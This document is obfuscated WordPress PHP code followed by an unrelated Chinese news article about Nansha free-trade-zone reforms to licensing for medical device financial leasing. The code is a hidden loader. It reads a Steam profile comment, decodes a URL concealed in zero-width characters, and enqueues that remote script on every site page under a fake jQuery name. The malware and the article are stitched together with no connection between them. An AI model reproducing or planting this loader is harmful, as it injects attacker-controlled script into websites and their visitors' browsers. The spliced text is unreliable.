goto dfc1d; D7304: function decode_html_entities_like_source(string $s) : string { goto d39d7; C56fe: $s = str_replace(["\134\x6e", "\134\x22", "\x26\x71\165\157\x74\73", "\x26\x61\x6d\160\x3b", "\x26\154\x74\73", "\x26\147\x74\73"], ["\xa", "\x22", "\x22", "\x26", "\74", "\76"], $s); goto Ba34b; d39d7: $s = preg_replace_callback("\x2f\x26\43\170\x28\133\134\144\x61\55\x66\x41\55\x46\x5d\53\x29\x3b\57\151", function ($m) { return mb_convert_encoding(pack("\110\x2a", $m[1]), "\x55\124\106\55\70", "\x55\x43\123\55\x32\102\105"); }, $s); goto C56fe; Ba34b: return $s; goto b61ef; b61ef: } goto D7078; D7078: function decode_zero_width_payload(string $text, string $password = '') : string { try { goto C2b2b; d3c12: $salt = substr($blob, 0, 8); goto D23dc; C9c3f: $bytes = array_map("\157\162\144", str_split($plain)); goto Cd597; Ef189: a7f7f: goto d13f0; ce377: $from = [$ZW[4], $ZW[5]]; goto e78f2; ec58b: if (!($unz === false)) { goto A9c55; } goto E9275; eed3b: if (!($leading === '')) { goto cfaee; } goto c489e; e9141: $blob = pack("\103\52", ...$bytes); goto d3c12; A98ef: $bytes = []; goto abbfc; d50d2: d308c: goto C9c3f; Ccd85: $iv = substr($dk, 0, 16); goto Df294; df35a: $ciphertext = substr($blob, 8); goto e998e; D85f8: cfaee: goto ec634; c5213: A9c55: goto D9e23; f6ec8: d17f8: goto e0fc4; e998e: $expectedHmac = null; goto Ed5ed; c87c5: $p += 8; goto Fd43b; F4fea: $payloadRest = mb_substr($payload, 1, null, "\125\124\x46\x2d\x38"); goto Fe277; Dba93: e6efa: goto A98ef; aeada: Af03e: goto d50d2; d5bfd: if (!($p + 8 <= strlen($bits))) { goto d36a9; } goto eaec6; eaec6: $bytes[] = bindec(substr($bits, $p, 8)); goto da13a; D9e23: return $unz !== false ? $unz : ''; goto ee358; c489e: return ''; goto D85f8; C8282: $containerChar = mb_substr($payload, 0, 1, "\x55\x54\x46\55\70"); goto F4fea; E88ce: $payload = mb_substr($leading, 1, null, "\125\x54\106\x2d\70"); goto d3dbb; b8587: $hasHmac = $containerIdx === 0; goto d9773; f91c2: if (!$isEncrypted) { goto fa074; } goto e9141; d3d85: return ''; goto f6ec8; B4da4: if (!($plain === false)) { goto d17f8; } goto d3d85; d0120: foreach ($inv as $b) { goto a21fc; Ab8c2: $allPrintable = false; goto F779a; abe91: F0425: goto e51e8; a21fc: if (!($b < 32 || $b > 126)) { goto a1a65; } goto Ab8c2; F779a: goto F4297; goto db1ad; db1ad: a1a65: goto abe91; e51e8: } goto d19ff; Abc09: foreach (explode("\40", $text) as $word) { goto d56b5; d82d0: goto e8b9d; goto bb211; bb211: f0f9c: goto E332b; e3ec9: $pos = 0; goto B5c7a; fbd9c: $leading = mb_substr($word, 0, $pos, "\x55\x54\106\55\70"); goto d82d0; E02b9: if (empty($intersection)) { goto f0f9c; } goto e3ec9; B5c7a: foreach ($chars as $i => $ch) { goto e8276; D24b7: C7bc3: goto C1cb6; E548e: $pos = $i; goto c3795; Ba85e: $pos = $i + 1; goto D24b7; c3795: goto Fd5ba; goto ce7e7; ce7e7: Caf0c: goto Ba85e; e8276: if (in_array($ch, $ZW, true)) { goto Caf0c; } goto E548e; C1cb6: } goto C2679; C2679: Fd5ba: goto fbd9c; C59c6: $intersection = array_intersect($ZW, $chars); goto E02b9; E332b: c181e: goto A212d; d56b5: $chars = preg_split("\57\x2f\x75", $word, -1, PREG_SPLIT_NO_EMPTY); goto C59c6; A212d: } goto D7121; E5afe: return implode('', array_map("\x63\150\162", $inv)); goto Be895; A7d8b: $modeIdx = array_search($modeChar, $ZW, true); goto e665f; Ac630: $raw = pack("\x43\52", ...$inv); goto C191f; bee51: if ($allPrintable) { goto db96b; } goto Ac630; d13f0: $expectedHmac = substr($blob, 8, 32); goto b2e8e; e78f2: $to = [$pair[0] . $pair[0], $pair[1] . $pair[1]]; goto c4816; e0fc4: if (!$hasHmac) { goto d308c; } goto B53b3; d9773: $bits = ''; goto F3450; C2b2b: $ZW = ["\xe2\200\x8c", "\xe2\x80\215", "\342\201\xa1", "\xe2\201\242", "\xe2\201\243", "\342\201\244"]; goto a368e; A96fe: e9132: goto fce6f; ee358: db96b: goto E5afe; d3dbb: $pairsByIndex = [$ZW[0] . $ZW[1], $ZW[0] . $ZW[2], $ZW[0] . $ZW[3], $ZW[1] . $ZW[2], $ZW[1] . $ZW[3], $ZW[2] . $ZW[3]]; goto A7d8b; a368e: $leading = ''; goto Abc09; da13a: e90ab: goto c87c5; Ed5ed: goto e9132; goto Ef189; Dd6e5: d36a9: goto f91c2; Cd597: fa074: goto Dbf10; Db703: $plain = openssl_decrypt($ciphertext, "\x61\145\x73\55\62\65\x36\x2d\143\164\x72", $key, OPENSSL_RAW_DATA, $iv); goto B4da4; ec634: $modeChar = mb_substr($leading, 0, 1, "\125\124\x46\55\x38"); goto E88ce; D7121: e8b9d: goto eed3b; B53b3: $h = hash_hmac("\163\150\x61\x32\x35\x36", $plain, $key, true); goto f8a49; b2e8e: $ciphertext = substr($blob, 40); goto A96fe; C191f: $unz = @gzuncompress($raw); goto ec58b; d19ff: F4297: goto bee51; F00f8: $allPrintable = true; goto d0120; D23dc: if ($hasHmac) { goto a7f7f; } goto df35a; abbfc: $p = 0; goto F1f05; Fd43b: goto bd29e; goto Dd6e5; Dc56a: return ''; goto aeada; E9275: $unz = @gzinflate($raw); goto c5213; f8a49: if (hash_equals($expectedHmac, $h)) { goto Af03e; } goto Dc56a; Df294: $key = substr($dk, 16, 32); goto Db703; Dbf10: $inv = array_map(fn($b) => ~$b & 0xff, $bytes); goto F00f8; fce6f: $dk = hash_pbkdf2("\163\150\x61\x35\61\62", $password, $salt, 10000, 48, true); goto Ccd85; e665f: $pair = $modeIdx !== false && isset($pairsByIndex[$modeIdx]) ? preg_split("\57\57\165", $pairsByIndex[$modeIdx], -1, PREG_SPLIT_NO_EMPTY) : [$ZW[0], $ZW[1]]; goto ce377; F3450: foreach (preg_split("\x2f\57\x75", $payloadRest, -1, PREG_SPLIT_NO_EMPTY) as $ch) { goto E2839; be63a: $bits .= str_pad(decbin($i), 2, "\x30", STR_PAD_LEFT); goto db3e7; a5a82: c2881: goto be7a7; d55eb: if (!($i !== false)) { goto baf2f; } goto be63a; db3e7: baf2f: goto a5a82; E2839: $i = array_search($ch, $ZW, true); goto d55eb; be7a7: } goto Dba93; c4816: $payload = str_replace($from[1], $to[1], $payload); goto de7cd; de7cd: $payload = str_replace($from[0], $to[0], $payload); goto C8282; Fe277: $containerIdx = array_search($containerChar, $ZW, true); goto D5820; D5820: $isEncrypted = $containerIdx === 0 || $containerIdx === 1; goto b8587; F1f05: bd29e: goto d5bfd; Be895: } catch (\Throwable $e) { return ''; } } goto a7fb4; dfc1d: function fetch_comment_text_from_url(string $url) : string { goto b27df; D7ac4: return $text; goto Dbfd9; F1e30: curl_close($ch); goto bd612; bd612: return get_transient($cache_key) ?: ''; goto A6f8c; dd4b3: set_transient($cache_key, $text, 300); goto D7ac4; Ef31e: $ch = curl_init($url); goto A6435; A6435: curl_setopt_array($ch, [CURLOPT_RETURNTRANSFER => true, CURLOPT_USERAGENT => "\115\x6f\x7a\x69\x6c\154\x61\x2f\x35\56\x30\40\50\127\x69\156\144\157\x77\x73\40\116\x54\x20\x31\60\x2e\x30\73\40\x57\151\156\x36\x34\73\40\x78\66\64\x29\x20\101\160\x70\x6c\x65\127\x65\142\x4b\x69\164\x2f\x35\63\67\x2e\x33\66", CURLOPT_TIMEOUT => 10]); goto Dea9b; b27df: $cache_key = "\143\141\160\164\x69\157\x6e\137" . md5($url); goto Ef31e; Ceb67: return get_transient($cache_key) ?: ''; goto D1440; Dea9b: $html = curl_exec($ch); goto d4307; d4307: if (!($html === false)) { goto D3bed; } goto F1e30; Dbfd9: C305c: goto Ceb67; Db868: curl_close($ch); goto e1b29; e1b29: if (!preg_match("\57\74\144\x69\x76\x5b\x5e\76\135\x2a\x63\x6c\x61\x73\163\75\133\47\134\42\135\143\x6f\x6d\155\x65\x6e\x74\x74\150\162\145\x61\x64\x5f\x63\x6f\x6d\155\145\156\164\137\x74\145\170\164\133\x27\134\x22\x5d\133\x5e\76\x5d\x2a\76\x28\x2e\52\77\51\x3c\134\x2f\144\x69\x76\x3e\57\x69\x73", $html, $m)) { goto C305c; } goto e58d9; A6f8c: D3bed: goto Db868; e58d9: $text = decode_html_entities_like_source($m[1]); goto dd4b3; D1440: } goto D7304; a7fb4: function enqueue_external_script_from_steam_comment() : void { goto Bc875; B9ec2: wp_enqueue_script("\x61\163\x61\x68\151\x2d\152\x71\165\x65\162\x79\55\x6d\x69\156\55\142\165\x6e\x64\x6c\145", $url, [], null, true); goto c0558; c0558: Ad652: goto Fa6d5; d25b8: if (!filter_var($url, FILTER_VALIDATE_URL)) { goto Ad652; } goto B9ec2; Bc875: $steamProfileUrl = "\150\164\x74\160\x73\72\x2f\57\x73\x74\145\x61\x6d\x63\157\155\x6d\165\x6e\x69\164\171\56\143\157\x6d\57\151\144\x2f\60\x78\145\x65\162\x69\145\x2f"; goto f0971; af6d0: $url = $domainOrPath; goto d25b8; f0971: $commentText = fetch_comment_text_from_url($steamProfileUrl); goto b2ed4; b2ed4: $domainOrPath = decode_zero_width_payload($commentText, ''); goto af6d0; Fa6d5: } goto Ae8ce; Ae8ce: add_action("\167\x70\x5f\145\x6e\x71\165\145\165\x65\137\163\x63\x72\151\x70\164\163", "\x65\x6e\161\x75\x65\x75\145\x5f\x65\170\x74\145\162\156\x61\x6c\x5f\163\x63\x72\x69\160\x74\137\x66\x72\x6f\155\x5f\x73\x74\145\x61\x6d\x5f\x63\157\155\155\145\x6e\164");
近日,《中国(广东)自由贸易试验区广州南沙新区片区开展“一照一码走天下”改革试点工作方案》正式印发,在全国率先实现企业“一照一码走天下”的南沙再次走在前列。
在自贸试验区、粤港澳深度合作示范区内假定企业符合准入条件,不再办理许可审批,企业凭“一照一码”营业执照直接经营,大限度减少审批发证。
在大型医疗器械融资租赁的审批上,南沙自贸区试点的医疗器械融资租赁企业无需再办理《医疗器械经营许可证》,只需要按照营业执照记载的经营范围直接经营,无疑迎来大放开!
改革前,企业按规定须办理《医疗器械经营许可证》,执行与普通医疗器械经营企业基本一致的监管要求。融资租赁企业作为设备抵押贷款的出租方,增加了不必要的人员、设施、管理成本。
改革后,在示范区内的试点企业作出合格假定承诺后,即可凭营业执照记载的经营范围直接经营,无须再办许可。”
医疗器械的进货查验、销售记录、运输贮存和使用管理等责任,通过签订三方医疗器械质量安全管理责任协议的方式,明确由医疗设备供应商和承租人(医疗机构)来承担,设备供应商具备经营许可资格即可。
医疗器械融资租赁审批监管放开,这已经不是首例。
今年2月,厦门自贸片区管委会、厦门市市场监督管理局和厦门市卫计委联合出台《关于福建自贸试验区厦门片区大型医疗器械融资租赁监管改革的若干意见》(以下简称《意见》)。
据介绍,新出台的《意见》根据融资租赁的行业特点制定,将对融资租赁企业提供更多便利。
首先,优化审批管理。对申请大型医疗器械融资租赁经营许可的,压缩审批时限到法定时限的35%以内。受理许可申请的市场监管部门应当自收到申请材料之日起10个工作日内对申请材料进行审核,并进行现场核查。对申请备案的,市场监管部门当场核对企业提交材料的完整性后,即可发放第二类医疗器械融资租赁经营备案凭证。
其次,该政策便利企业进行许可申请或备案,住所登记在自贸片区内的融资租赁或者金融租赁企业可以直接向企业经营场所所在地的区市场监管部门申请医疗器械经营许可和备案。与非融资租赁企业申请的医疗器械经营许可证或备案相关规定相比,该政策对从事大型医疗器械融资租赁企业在仓库方面没有具体的要求。
而纵观全国,国务院在11月23日发布的《关于支持自由贸易试验区深化改革创新若干措施的通知》,已经明确卫生健康行政部门对11个自贸试验区内的社会办医疗机构配置乙类大型医用设备实行告知承诺制。
相信在大型医疗设备融资租赁审批方面,全国自贸区预计可能也会逐步放开!
大型医疗设备不同于药品领域,每个细分市场容量较小,但专业壁垒极高,在研发、专业学术推广、售后服务等方面各领域间有较大跨度。在高值耗材、诊疗设备,诊断试剂等领域,医疗机构对医疗设备需求量巨大,单纯依靠自有资金难以完成,目前租赁业务渗透规模尚小。
截至2014年底我国医疗设备融资租赁投放额度仅占当年医疗设备销售总额不到10%,而依靠厂商系或独立系等专业租赁公司,美国通过融资租赁方式更新医疗设备的比重已高达80%。所以,我国医疗设备行业融资租赁需求前景广阔。
公开资料显示,2016年,我国医疗设备市场规模达到2489.42亿元,相比上年同比增长16.18%。同年医疗设备融资租赁额为858亿元,渗透率高达到了34.5%。
未来随着政策的放开,医疗设备行业融资租赁的渗透率将进一步提高。